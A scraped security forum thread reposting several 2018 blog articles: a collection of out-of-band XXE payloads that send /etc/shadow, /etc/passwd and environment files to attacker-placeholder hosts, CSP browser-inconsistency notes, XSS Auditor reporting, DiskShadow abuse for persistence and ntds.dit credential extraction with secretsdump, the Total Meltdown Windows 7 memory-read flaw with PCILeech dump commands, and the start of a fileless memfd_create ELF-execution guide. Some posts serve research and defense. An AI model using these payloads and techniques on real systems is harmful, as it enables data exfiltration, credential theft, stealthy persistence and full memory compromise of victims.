--------------------------------------------------------------- OoB extraction --------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; ]> <r>&exfil;</r> ## External dtd: ## <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> ---------------------------------------------------------------- OoB variation of above (seems to work better against .NET) ---------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; %exfil; ]> ## External dtd: ## <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> --------------------------------------------------------------- OoB extraction --------------------------------------------------------------- <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY % data3 SYSTEM "file:///etc/shadow"> <!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd"> %sp; %param3; %exfil; ]> ## External dtd: ## <!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://Evilhost:port/%data3;'>"> ----------------------------------------------------------------------- OoB extra ERROR -- Java ----------------------------------------------------------------------- <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY % data3 SYSTEM "file:///etc/passwd"> <!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd"> %sp; %param3; %exfil; ]> <r></r> ## External dtd: ## <!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external; ----------------------------------------------------------------------- OoB extra nice ----------------------------------------------------------------------- <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % start "<![CDATA["> <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml "> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://evil/evil.xml"> %dtd; ]> <root>&all;</root> ## External dtd: ## <!ENTITY all "%start;%stuff;%end;"> ------------------------------------------------------------------ File-not-found exception based extraction ------------------------------------------------------------------ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" > %one; %two; %four; ]> ## External dtd: ## <!ENTITY % three SYSTEM "file:///etc/passwd"> <!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> -------------------------^ you might need to encode this % (depends on your target) as: % -------------- FTP -------------- <?xml version="1.0" ?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd"> %asd; %c; ]> <a>&rrr;</a> ## External dtd ## <!ENTITY % d SYSTEM "file:///proc/self/environ"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> --------------------------- Inside SOAP body --------------------------- <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> --------------------------- Untested - WAF Bypass --------------------------- <!DOCTYPE :. SYTEM "http://" <!DOCTYPE :_-_: SYTEM "http://" <!DOCTYPE {0xdfbf} SYSTEM "http://" view rawXXE_payloads hosted with by GitHub Sursa: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
-
Stefan Matsson 2018-03-26 # Security CSP IMPLEMENTATIONS ARE BROKEN TL;DR frame-src is inconsistent cross browser block-all-mixed-content is broken in Chrome and Opera CSP reports are inconsitent Edge has some weird edge cases (no pun intended) INTRO There has been a lot of talk lately about Content Security Policy (CSP) after an accessibility script called BrowseAloud got infected by a cryptominer and force the users of a couple of thousand websites to mine cryptocurrency without their knowledge. Content Security Policy could have prevented this issue as it contains rules for what the browser can load and what not to load. Read more at https://content-security-policy.com I recently held a talk with the title “Content Security Policy - Or how we ruined our site, learned a lesson, broke the site again and then fixed it”. This talk was based on my work at my current client. This post is sort of a summary of that talk and will outline some of the issues we found in different browsers and with different combinations of devices, OSs, browsers, extensions and whatnot. SOME INFO ON THE SYSTEM WE ARE BUILDING My client provides payment services for e-commerce. The system will be loaded as an iframe on the e-commerce site and allows the customer to finish their purchase. We use features in CSP that require us to use CSP2 (e.g. script hashes). Our system in turn loads an iframe from a trusted service provider (let’s call it SystemX). SystemX will in some cases redirect to one of their trusted providers. SystemX has literaly hundreds of trusted providers all over the world and each of these have their own page that must be loaded in the iframe. I will not go into more details on why to not reveal to much information about my client. FRAME-SRC IS INCONSISTENT CROSS BROWSER If your CSP contains a frame-src that does not contain mailto: or tel: these links will be blocked inside the iframe except in Firefox and Edge. Firefox will open both links and Edge will open the mailto link but block the tel link. I’m not really sure if it’s broken in Firefox or in the other browsers. There are valid arguments for both cases. Workaround: Add mailto: and tel: to your CSP: frame-src 'self' mailto: tel: I have reported this to Microsoft but have not heard back. Affected browsers: Firefox and Edge or all others depending on your point of view Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-links-frame-src/ EDGE AND CUSTOM ERROR PAGES We load an iframe from a trusted service provider which in turn redirects to different sites depending on circumstances. As we cannot know what URLs will be redirected to we currenty use this frame-src in our CSP: frame-src 'self' data: https: The issue with Edge is that it will load custom error pages for issues such as DNS errors, SmartScreen blocking and error responses from the server (e.g. 400, 404, 500 etc). The error page is loaded via a ms-appx-web:// url (e.g ms-appx-web:///assets/errorpages/http_500.htm) which is blocked by the CSP and a blank page is displayed to the user. The result is that our service provider’s iframe is just blank if an error occurrs. I have reported this issue to Microsoft in early March but have not heard anything back from them. Workaround: Add ms-appx-web: to our frame-src: frame-src 'self' data: https: ms-appx-web: Affected browsers: Edge Proof of concept: https:/jellyhive.github.io/CspImplementationsAreBroken/edge-ms-appx-web-frame-src/ EDGE AND EXTENSIONS Extensions installed in Edge are subject to the current page’s content security policy. Basically all installed extensions that try to do anything from loading images to JS will fail and a CSP violation will be logged. According to the CSP spec this is wrong. The issue has been fixed but not yet released according to the Edge issue tracker (issue 1132012). Affected browsers: Edge BLOCK-ALL-MIXED-CONTENT BLOCKS TEL AND MAILTO LINKS IN IFRAMES BUT NOT IN THE PARENT PAGE If you serve your site using HTTPS and use the block-all-mixed-content directive in your CSP, mailto and tel links will be blocked inside iframes but not on your main page. This does not happen if you serve the site using HTTP. If the user tries to click a mailto or tel link on your page (i.e. the parent page) it will work as intended. Clicking the same links in an iframe will log one of these two errors: Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'mailto:...'. This request has been blocked; the content must be served over HTTPS. Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'tel:...'. This request has been blocked; the content must be served over HTTPS. This issue has been reported to Google and Opera. Opera has not yet responded. Workaround: Remove block-all-mixed-content from your CSP (possibly use upgrade-insecure-requests instead) Affected browsers: Chrome and Opera Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-link-block-all-mixed-content/ SAFARI ON OLDER IOS DEVICES DOES NOT SUPPORT CSP2 “Older” in this case meaning iOS 9 or earlier. Safari on iOS 10 and 11 do support CSP2. Since we require the use of script hashes we also require CSP2. Desktop Safari is also affected is not as big of a problem as most desktops are up to date. Current usage on our site is less than 0.9% for older Safari on desktop. Workaround: There is no way to make this work so we have disabled CSP for older iOS devices using user agent sniffing. Affected browsers: Safari on iOS < 10 (both iPhone and iPad) and Safari 9 or earlier on desktop INTERNET EXPLORER 11 ONLY SUPPORTS X-CONTENT-SECURITY-POLICY AND CSP1 IE11 supports CSP1 using the X-Content-Security-Policy. If you wish to support IE11 you need to either do some user agent sniffing and change the header from Content-Security-Policy to X-Content-Security-Policy or send out both headers for everyone. In our case we barely have any customers on IE11 so we just send out the regular Content-Security-Policy header which is then ignored by IE11. Affected browsers: Internet Explorer 11 (older versions does not support CSP) CSP REPORTS DIFFER BETWEEN BROWSERS The reports sent to your report-uri should follow a common standard defined in the CSP spec but browsers differ on what data they send. Some versions of Safari includes the entire CSP in the violated-directive property. This is like saying “Something went wrong. You find out what and deal with it.” Chrome on Android does sometimes not provide a blocked-uri when the violated-directive is frame-src. This means that we have no way of knowing what URL was blocked in the iframe. Most browsers does not provide a script-sample when an inline script is blocked. script-sample is very helpful in debugging what script was blocked. CSP REPORTS CONTAIN LOTS OF FALSE POSITIVES This is primarily due to browser extensions. Most extension work by injecting code on the page and code on the page is subject to the page’s CSP. A common issue we have found in our logs is violated-directive: script-src blocked-uri: about:blank which is casued by adblockers when they replace the loading of tracking scripts (e.g. Google Analytics) with the loading of about:blank. SUMMARY Content Security Policy is a great tool that should be deployed in more places. It does however take some fine tuning to make it work properly on a specific site. Sursa: https://jellyhive.com/activity/posts/2018/03/26/csp-implementations-are-broken/
-
Introducing XSS Auditor reporting to Report URI March 26, 2018 Whilst we already have support for CSP reports over at Report URI, there is another potential source of information about XSS attacks that may be attempted or happening on your site. The X-XSS-Protection header allows you to configure the XSS Auditor, deem what action it should take and request that the auditor send reports if action is required. We now support XSS Auditor reporting on Report URI! The XSS Auditor The XSS Auditor runs whilst HTML is being parsed and attempts to find reflected XSS attacks against the user. If it finds a possible attack the Auditor can take no action, it can filter what it thinks is the attack payload or it can refuse to render the page at all. You can find more details about the XSS Auditor which is present in Chromium and WebKit so there is a good share of browsers that have one. Configuring the Auditor The default configuration for the XSS Auditor varies depending on which version of which browser you're using, of course, but configuring it is easy enough. You can control the auditor with the X-Xss-Protectionheader with a few simple values. You can read more detail about configuring the auditor in my blog post Hardening your HTTP response headers and you can test to see if your site, or any other site, has it deployed properly using securityheaders.io. No matter which configuration you use, as long as you have the auditor enabled, it can send reports about the action it takes. X-Xss-Protection: 1; mode=block; report=https://{subdomain}.report-uri.com/r/d/xss/enforce XSS Reports Whilst the original purpose of CSP was to defend against XSS attacks, and it can do that very sucessfully, if you have both CSP and XXP (X-Xss-Protection) deployed you can benefit from an even better level of protection. There's no reason to think you don't need one if you have the other, leverage the protection of both! Whether you do or don't have CSP deployed, you can deploy XXP and have the Auditor stop attacks before they even take place. If CSP is a last line of defence in the browser then XXP is an additional, penulitmate line of defence. With the auditor configured, if it sees any kind of reflected XSS attack on your site it will send a report that looks like this. "xss-report" : { "request-url":"https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/?search=%3Cscript%3Ealert(123);%3C/script%3E", "request-body":""} } This is a great report to receive and it will tip you off about a likely issue on one of your pages. The good thing about the report is that it won't be sent if the browser doesn't find the content of the GET parameter reflected somewhere in the page, so the false positive rate should be fairly low. You might see some novel attacks against your users, find some nifty XSS payloads or just rest assured knowing that if the browser thinks there's a problem then it will tell you. Deploy it alongside CSP, before CSP or after CSP, it doesn't really matter, but it's available now and you should go check it out. Support The XSS Auditor can send reports from Chromium and WebKit based browsers which gives us a pretty high level of visibility. WebKit will happily send those reports right now but Chrome does have a small interruption in service at present. You can read more in the Chromium Bug but Chrome will being sending reports again during April, so we will be back on track there. The great thing about reporting mechanisms like this is that we can still get value from the feature even without 100% browser support. There are a lot of WebKit browsers out there and they may be able to tell you something useful. Other Updates We've also released a few other features here and there over the last couple of months so I wanted to detail those too. The list is far from exhaustive but here's a few: When filtering your repors on the Reports page, the filter is now reflected into the URL. This means you can bookmark/share/save filters for more convenient use in the future. Back/forward navigation also works as expected. After the recent update that introduced wildcard queries in the hostname and path fields, we've also introduced a 'not' filter that does exactly what you'd expect. We've made some improvements to our filtering for inbound reports. There's now less noise making it through to your account and we have special handling in place for a few browser bugs so reports will make more sense overall. There have been countless UI tweaks and improvements to make the browsing experience better including series highlighting and toggling on the graphs page, better sorting on the Reports tables, Team invite emails, performance improvements and much more! After launching XSS Auditor Reporting today we've started our 7 day countdown to our next feature launch which is going to be a big one. I'm really excited about the launch next week and I'm hoping everyone will love the new feature as much as we do! Sursa: https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/
-
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction MARCH 26, 2018 ~ BOHOPS [Source: blog.microsoft.com] Introduction Not long ago, I blogged about Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction. This tool was quite interesting because it was yet another utility to perform volume shadow copy operations, and it had a few other features that could potentially support other offensive use cases. In fairness, evasion and persistence are probably not the strong suits of Vshadow.exe, but some of those use cases may have more relevance in its replacement – DiskShadow.exe. In this post, we will discuss DiskShadow, present relevant features and capabilities for offensive opportunities, and highlight IOCs for defensive considerations. *Don’t mind the ridiculous title – it just seemed thematic What is DiskShadow? “DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode.“ – Microsoft Docs DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary. The VSS features of DiskShadow require privileged-level access (with UAC elevation), however, several command utilities can be invoked by a non-privileged user. This makes DiskShadow a very interesting candidate for command execution and evasive persistence. DiskShadow Command Execution As a feature, the interactive command interpreter and script mode support the EXEC command. As a privileged or an unprivileged user, commands and batch scripts can be invoked within Interactive Mode or via a script file. Let’s demonstrate each of these capabilities: Note: The proceeding example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail. Interactive Mode In the following example, a normal user invokes calc.exe: Script Mode In the following example, a normal user invokes calc.exe and notepad.exe by calling the script option with diskshadow.txt: diskshadow.exe /s c:\test\diskshadow.txt Like Vshadow, take note that the DiskShadow.exe is the parent process of the spawned executable. Additionally, DiskShadow will continue to run until its child processes are finished executing. Auto-Start Persistence & Evasion Since DiskShadow is a Windows signed binary, let’s take a look at a few AutoRuns implications for persistence and evasion. In the proceeding examples, we will update our script then create a RunKey and Scheduled Task. Preparation Since DiskShadow is “window forward” (e.g. pops a command window), we will need to modify our script in a way to invoke proof-of-concept pass-thru execution and close the parent DiskShadow and subsequent payloads as quickly as possible. In some cases, this technique may not be considered very stealthy if the window is opened for a lengthy period of time (which is good for defenders if this activity is noted and reported by users). However, this may be overlooked if users are conditioned to see such prompts at logon time. Note: The proceeding example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail. First, let’s modify our script (diskshadow.txt) to demonstrate this basic technique: EXEC "cmd.exe" /c c:\test\evil.exe *In order to support command switches, we must quote the initial binary with EXEC. This also works under Interactive Mode. Second, let’s add persistence with the following commands: - Run Key Value - reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt" - User Level Scheduled Task - schtasks /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt" Let’s take a further look at these… AutoRuns – Run Key Value After creating the key value, we can see that our key is hidden when we open up AutoRuns and select the Logon tab. By default, Windows signed executables are hidden from view (with a few notable exceptions) as demonstrated in this screenshot: After de-selecting “Hide Windows Entries”, we can see the AutoRuns entry: AutoRuns – Scheduled Tasks Like the Run Key method, we can see that our entry is hidden in the default AutoRuns view: After de-selecting “Hide Windows Entries”, we can see AutoRuns entry: Extracting the Active Directory Database Since we are discussing the usage of a shadow copy tool, let’s move forward to showcase (yet another) VSS method for extracting the Active Directory (AD) database – ntds.dit. In the following walk-through, we will assume successful compromise of an Active Directory Domain Controller (Win2k12) and are running DiskShadow under a privileged context in Script Mode. First, let’s prepare our script. We have performed some initial recon to determine our target drive letter (for the logical drive that ‘contains’ the AD database) to shadow as well as discovered a logical drive letter that is not in use on the system. Here is the DiskShadow script (diskshadow.txt): set context persistent nowriters add volume c: alias someAlias create expose %someAlias% z: exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit delete shadows volume %someAlias% reset [Helpful Source: DataCore] In this script, we create a persistent shadow copy so that we can perform copy operations to capture the sensitive target file. By mounting a (unique) logical drive, we can guarantee a copy path for our target file, which we will extract to the ‘exfil’ directory before deleting our shadow copy identified by someAlias. *Note: We can attempt to copy out the target file by specifying a shadow device name /unique identifier. This is slightly stealthier, but it is important to ensure that labels/UUIDs are correct (via initial recon) or else the script will fail to run. This use case may be more suitable for Interactive Mode. The commands and results of the DiskShadow operation are presented in this screenshot: type c:\diskshadow.txt diskshadow.exe /s c:\diskshadow.txt dir c:\exfil In addition to the AD database, we will also need to extract the SYSTEM registry hive: reg.exe save hklm\system c:\exfil\system.bak After transferring these files from the target machine, we use SecretsDump.py to extract the NTLM Hashes: secretsdump.py -ntds ntds.dit -system system.bak LOCAL Success! We have used another method to extract the AD database and hashes. Now, let’s compare and contrast DiskShadow and Vshadow… DiskShadow vs. Vshadow DiskShadow.exe and VShadow.exe have very similar capabilities. However, there are a few differences between these applications that may justify which one is the better choice for the intended operational use case. Let’s explore some of these in greater detail: Operating System Inclusion DiskShadow.exe is included with the Windows Server operating system since 2008. Vshadow.exe is included with the Windows SDK. Unless the target machine has the Windows SDK installed, Vshadow.exe must be uploaded to the target machine. In a “living off the land” scenario, DiskShadow.exe has the clear advantage. Utility & Usage Under the context of a normal user in our test case, we can use several DiskShadow features without privilege (UAC) implications. In my previous testing, Vshadow had privilege constraints (e.g. external command execution could only be invoked after running a VSS operation). Additionally, DiskShadow is flexible with command switch support as previously described. DiskShadow.exe has the advantage here. Command Line Orientation Vshadow is “command line friendly” while DiskShadow requires use by interactive prompt or script file. Unless you have (remote) “TTY” access to a target machine, DiskShadow’s interactive prompt may not be suitable (e.g. for some backdoor shells). Additionally, there is an increased risk for detection when creating files or uploading files to a target machine. In the strict confines of this scenario, Vshadow has the advantage (although, creating a text file will likely have less impact than uploading a binary – refer to the previous section). AutoRuns Persistence & Evasion In the previous Vshadow blog post, you may recall that Vshadow is signed with the Microsoft signing certificate. This has AutoRuns implications such that it will appear within the Default View since Microsoft signed binaries are not hidden. Since DiskShadow is signed with the Windows certificate, it is hidden from the default view. In this scenario, DiskShadow has the advantage. Active Directory Database Extraction If script mode is the only option for DiskShadow usage, extracting the AD database may require additional operations if assumed defaults are not valid (e.g. Shadow Volume disk name is not what we expected). Aside from crafting and running the script, a logical drive may have to be mapped on the target machine to copy out ntds.dit. This does add an additional level of noise to the shadow copy operation. Vshadow has the advantage here. Conclusion All things considered, DiskShadow seems to be more compelling for operational use. However, that does not discount Vshadow (and other VSS methods for that matter) as a prospective tool used by threat agents. Vshadow has been used maliciously in the past for other reasons. For DiskShadow, Blue Teams and Network Defenders should consider the following: Monitor the Volume Shadow Service (VSS) for random shadow creations/deletions and any activity that involves the AD database file (ntds.dit). Monitor for suspicious instances of System Event ID 7036 (“The Volume Shadow Copy service entered the running state”) and invocation of the VSSVC.exe process. Monitor process creation events for diskshadow.exe and spawned child processes. Monitor for process integrity. If diskshadow.exe runs at a medium integrity, that is likely a red flag. Monitor for instances of diskshadow.exe on client endpoints. Unless there is a business need, diskshadow.exe *should* not be present on client Windows operating systems. Monitor for new and interesting logical drive mappings. Inspect suspicious “AutoRuns” entries. Scrutinize signed binaries and inspect script files. Enforce Application Whitelisting. Strict policies may prevent DiskShadow pass-thru applications from executing. Fight the good fight, and train your users. If they see something (e.g. a weird pop up window), they should say something! As always, if you have questions or comments, feel free to reach out to me here or on Twitter. Thank you for taking the time to read about DiskShadow! Sursa: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-
Total Meltdown? Did you think Meltdown was bad? Unprivileged applications being able to read kernel memory at speeds possibly as high as megabytes per second was not a good thing. Meet the Windows 7 Meltdown patch from January. It stopped Meltdown but opened up a vulnerability way worse ... It allowed any process to read the complete memory contents at gigabytes per second, oh - it was possible to write to arbitrary memory as well. No fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process. Exploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required - just standard read and write! Accessing memory at over 4GB/s, dumping to disk is slower due to disk transfer speeds. How is this possible? In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself. The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM. For more in-depth information about paging please have a look at Getting Physical: Extreme abuse of Intel based Paging Systems - Part 1 and Part 2. PML4 self-referencing entry at offset 0xF68 with value 0x0000000062100867. Windows have a special entry in this topmost PML4 page table that references itself, a self-referencing entry. In Windows 7 the PML4 self-referencing is fixed at the position 0x1ED, offset 0xF68 (it is randomized in Windows 10). This means that the PML4 will always be mapped at the address: 0xFFFFF6FB7DBED000 in virtual memory. This is normally a memory address only made available to the kernel (Supervisor). Since the permission bit was erroneously set to User this meant the PML4 was mapped into every process and made available to code executing in user-mode. "kernel address" memory addresses mapped in every process as user-mode read/write pages. Once read/write access has been gained to the page tables it will be trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization. All one has to do is to write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory. The last '7' in the PML4e 0x0000000062100867 (from above example) indicates that bits 0, 1, 2 are set, which means it's Present, Writable and User-mode accessible as per the description in the Intel Manual. Excerpt from the Intel Manual, if bit 2 is set to '1' user-mode access are permitted. Can I try this out myself? Yes absolutely. The technique has been added as a memory acquisition device to the PCILeech direct memory access attack toolkit. Just download PCILeech and execute it with device type: -device totalmeltdown on a vulnerable Windows 7 system. Dump memory to file with the command: pcileech.exe dump -out memorydump.raw -device totalmeltdown -v -force . If you have the Dokany file system driver installed you should be able to mount the running processes as files and folders in the Memory Process File System - with the virtual memory of the kernel and the processes as read/write. To mount the processes issue the command: pcileech.exe mount -device totalmeltdown . Please remember to re-install your security updates if you temporarily uninstall the latest one in order to test this vulnerability. A vulnerable system is "exploited" and the running processes are mounted with PCILeech. Process memory maps and PML4 are accessed. Is my system vulnerable? Only Windows 7 x64 systems patched with the 2018-01 or 2018-02 patches are vulnerable. If your system isn't patched since December 2017 or if it's patched with the 2018-03 2018-03-29 patches or later it will be secure. Other Windows versions - such as Windows 10 or 8.1 are completely secure with regards to this issue and have never been affected by it. Other I discovered this vulnerability just after it had been patched in the 2018-03 Patch Tuesday. I have not been able to correlate the vulnerability to known CVEs or other known issues. Updates Windows 2008R2 was vulnerable as well. OOB security update released to fully resolve the vulnerability on 2018-03-29. CVE-2018-1038. Apply immediately if affected! Timeline 2018-03-xx--25: Issue identified in Windows 7 x64. Issue seemed to be patched already. PoC coded. Contacted MSRC with technical description asking if OK to publish a blog entry or if I should hold off publication. 2018-03-26: Green light given by MSRC for me to publish blog entry. 2018-03-27: Published blog entry and PoC. 2018-03-28: Found out that the March patches only partially resolved the vulnerability. Contacted MSRC again. 2018-03-29: OOB security update released by Microsoft. CVE-2018-1038. Apply immediately if affected! Huge Thank You to everyone at Microsoft that worked hard to resolve this issue. It is super impressive to be able to be able to roll out a complex kernel update in little over a day. It was never my intention to release a fairly potent kernel 0-day publicly. I hope the above timeline explains how this could happen. Sursa: https://blog.frizk.net/2018/03/total-meltdown.html?m=1
-
In-Memory-Only ELF Execution (Without tmpfs) 10 minute read CONTENTS INTRODUCTION CAVEATS ON TARGET MEMFD_CREATE(2) WRITE(2) OPTIONAL: FORK(2) EXECVE(2) SCRIPTING IT ARTIFACTS DEMO TL;DR In which we run a normal ELF binary on Linux without touching the filesystem (except /proc). Introduction Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process? Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary. The manpage has the following to say on the subject of naming anonymous files: The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects. In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name. Listing /proc/<PID>/fd, anonymous files look like this: stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd total 0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted) lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted) Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie. Caveats Unless we land on target with some way to call memfd_create(2), from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to acheive fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely. We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative. As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work. The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r. stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r 4.4.0-116-generic On Target Aside execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use. memfd_create(2) Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file. We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary. Because we’re using Perl’s syscall() to call the memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MEMFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_. stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' * asm-generic/unistd.h:#define __NR_memfd_create 279 asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create) linux/memfd.h:#define MFD_CLOEXEC 0x0001U x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319 x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356 x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319) x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a consatnt 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)). The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall(). Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead. Putting it together, let’s finally make our anonymous file: my $name = ""; my $fd = syscall(319, $name, 1); if (-1 == $fd) { die "memfd_create: $!"; } We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file: stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`' total 0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted) write(2) Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it. Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle: open(my $FH, '>&='.$fd) or die "open: $!"; select((select($FH), $|=1)[0]); We now have a file handle which refers to our anonymous file. Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file. perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary This will give us many, many lines similar to: print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/; print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/; 